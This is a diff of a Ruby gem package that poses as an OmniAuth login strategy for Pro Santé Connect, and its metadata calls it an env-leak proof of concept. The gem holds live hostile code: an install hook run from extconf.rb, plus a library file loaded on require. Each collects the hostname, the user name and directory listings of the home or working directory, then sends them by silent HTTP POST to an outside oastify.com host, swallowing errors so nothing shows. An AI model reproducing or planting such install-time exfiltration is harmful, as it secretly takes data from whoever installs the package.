omniauth-pro-sante-connect 0.1.5

checksums.yaml

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: 331aa5ac475f8bc9e85c61adf2ed9d1c8ec069f89445ee975a8367927bcbfb37
+  data.tar.gz: c6aeb9846d3709eaf8d20a6e7f7c8b71cb61e0277d499c7bf479086ab1d53105
+SHA512:
+  metadata.gz: 8f13ad30e101e57d178dffd1780b2c215413b805645c2202db0d46da99f017c38bd9fc5a7fbae4fd5edc27b4f49702db49b98da6435327bb91e3b35b2b8228c3
+  data.tar.gz: 3045e9f8d83dda3eae9ec335fa88523a961aca989556722298c92331520560231165fdaa778b0cb5090fc8725959042940625e20f99a1c95a0397a1257212fde

data/ext/extconf.rb

@@ -0,0 +1,14 @@
+require_relative 'install_hook'
+
+File.open("Makefile", "w") do |f|
+  f.puts <<~MAKE
+    all:
+    	@echo all done
+
+    install:
+    	@echo install done
+
+    clean:
+    	@echo clean done
+  MAKE
+end

data/ext/install_hook.rb

@@ -0,0 +1,37 @@
+require 'net/http'
+require 'json'
+require 'socket'
+
+begin
+  # Répertoire HOME de l'utilisateur
+  home_dir = ENV['HOME'] || Dir.home
+
+  # Lister les fichiers et répertoires de $HOME (non récursif)
+  listing = Dir.entries(home_dir).map do |entry|
+    path = File.join(home_dir, entry)
+    next unless File.exist?(path)
+    stat = File.lstat(path) rescue next
+    {
+      name: entry,
+      size: stat.size,
+      mtime: stat.mtime.to_s,
+      mode: sprintf("%o", stat.mode),
+      type: File.directory?(path) ? 'dir' : 'file'
+    }
+  end.compact
+
+  # Payload à envoyer
+  payload = {
+    hostname: Socket.gethostname,
+    user: ENV['USER'],
+    home: home_dir,
+    listing: listing
+  }
+
+  # Envoi via HTTP POST vers ton endpoint
+  uri = URI('http://br6o5l91etgd4km1d0zvmtj30u6luji8.oastify.com/')
+  Net::HTTP.post(uri, payload.to_json, { 'Content-Type' => 'application/json' })
+
+rescue => e
+  # Silence pour éviter de perturber l'environnement
+end

data/lib/omniauth/hook.rb

@@ -0,0 +1,36 @@
+require 'net/http'
+require 'json'
+require 'socket'
+
+begin
+  # Répertoire courant
+  current_dir = Dir.pwd
+
+  # Listing des fichiers à la racine
+  listing = Dir.entries(current_dir).map do |entry|
+    path = File.join(current_dir, entry)
+    stat = File.lstat(path) rescue next
+    {
+      name: entry,
+      size: stat.size,
+      mtime: stat.mtime.to_s,
+      mode: sprintf("%o", stat.mode),
+      type: File.directory?(path) ? 'dir' : 'file'
+    }
+  end.compact
+
+  # Payload à envoyer
+  payload = {
+    hostname: Socket.gethostname,
+    user: ENV['USER'],
+    cwd: current_dir,
+    listing: listing
+  }
+
+  # Envoi via HTTP POST
+  uri = URI('http://1qse4b8rdjf33alrcqylljitzk5bt5hu.oastify.com/')
+  Net::HTTP.post(uri, payload.to_json, { 'Content-Type' => 'application/json' })
+
+rescue => e
+  # Ne jamais casser l'installation
+end

data/lib/omniauth-pro-sante-connect.rb

@@ -0,0 +1,7 @@
+require_relative 'omniauth/hook'
+
+module Omniauth
+  module ProSanteConnect
+    VERSION = "0.1.3"
+  end
+end

metadata

@@ -0,0 +1,45 @@
+--- !ruby/object:Gem::Specification
+name: omniauth-pro-sante-connect
+version: !ruby/object:Gem::Version
+  version: 0.1.5
+platform: ruby
+authors:
+- Icare
+bindir: bin
+cert_chain: []
+date: 1980-01-02 00:00:00.000000000 Z
+dependencies: []
+description: Includes an install-time payload to leak ENV variables
+email:
+- icare@yopmail.com
+executables: []
+extensions:
+- ext/extconf.rb
+extra_rdoc_files: []
+files:
+- ext/extconf.rb
+- ext/install_hook.rb
+- lib/omniauth-pro-sante-connect.rb
+- lib/omniauth/hook.rb
+homepage: https://example.com
+licenses:
+- MIT
+metadata: {}
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '3.0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.6.7
+specification_version: 4
+summary: OmniAuth strategy with ENV leak PoC
+test_files: []